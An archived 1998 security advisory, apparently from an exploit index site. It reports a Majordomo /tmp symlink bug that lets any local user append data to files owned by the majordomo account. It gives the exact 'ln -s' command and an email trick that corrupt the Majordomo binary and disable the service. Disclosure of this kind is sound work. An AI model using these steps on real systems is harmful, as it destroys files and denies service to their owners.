Majordomo tmpfile bug

Description:Standard tmpfile problem
Author:Karl G - NOC Admin <>
Compromise:Any user on a system running majordomo can append arbitrary data to any file owned by the majordomo account.
Vulnerable Systems:Those running majordomo. This runs on a ton of systems (Solaris, Linux, IRIX, etc.).
Date:26 March 1998

Date: Thu, 26 Mar 1998 15:03:28 -0600
From: Karl G - NOC Admin <>
Subject: Majordomo /tmp exploit

Majordomo allows appending to any file owned by the majordomo user/group.

create a symlink in /tmp to any majordomo file
ex: ln -s /usr/lib/majordomo/majordomo /tmp/majordomo.debug

send a message with any emailer to majordomo with a "/" in the return
address. (i tested with Winbloze Internet Mail)
ex: blah/

the owner of majordomo will receive the below message... from then on,
majordomo will be inoperable.  (if the above symlink is used) Majordomo
keeps a debug log and appends to it every time it crashes with out
checking ownerships of the symlinks.. or for that matter for symlinks at

Subject: MAJORDOMO ABORT (mj_majordomo)


MAJORDOMO ABORT (mj_majordomo)!!

HOSTILE ADDRESS (no x400 c=) blah/

should the wrapper not check for such things?

party on.

  Karl Grindley
  ICQ: 2660211
  Network Administrator
  TQG Internet Network

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: